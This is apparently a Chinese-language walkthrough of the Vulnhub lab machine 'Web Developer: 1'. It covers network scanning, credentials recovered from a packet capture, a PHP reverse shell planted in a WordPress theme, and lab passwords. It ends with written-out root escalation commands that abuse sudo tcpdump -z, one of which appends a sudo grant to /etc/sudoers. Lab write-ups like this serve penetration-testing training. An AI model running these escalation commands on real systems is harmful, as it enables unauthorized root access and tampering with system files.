Vulnhub-靶机-WEB DEVELOPER: 1

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/web-developer-1,288/

nmap -n -p- -A -sC -sV -sS -o webdeveloper.nmap 192.168.226.131 -o webdevelop.nmap

nmap扫描结果

就开放了两个端口22和80，常规套路访问下80端口

看到WordPress字样，猜测是WordPress博客程序，使用dirb爆破下目录

根据爆破目录的结果，看到如下信息

下载此文件然后使用wireshark打开，过滤下http的数据包信息，然后看请求的URL和POST请求，一个个向下拉，到180这个位置找到了POST请求，发现了登录的账号和密码

webdeveloper
Te5eQg&4sBS!Yr$)wf%(DcAd

登录到WordPress后台之后找到404.php文件上传了php反弹shell，访问：http://192.168.226.131/wp-content/themes/twentysixteen/404.php 最终成功反弹shell

想变成tty-shell，但是发现没有Python，搞不了，那么找找配置文件试试运气

发现了数据库的用户名和密码，那么试试是否能够登录ssh

webdeveloper
MasterOfTheUniverse

成功登录，因为知道密码，就看看sudo -l，发现如下信息

可以通过tcpdump提权了，这个前面演示的靶机也有提到过

echo $'php /var/www/html/wp-content/themes/twentysixteen/404.php' > /tmp/.bmfx
chmod +x /tmp/.bmfx
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.bmfx -Z root

成功提权rootshell

=====================================================================================================================================================================

另一种提权思路

echo 'echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > /tmp/.bmfx
chmod +x /tmp/.bmfx
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.bmfx -Z root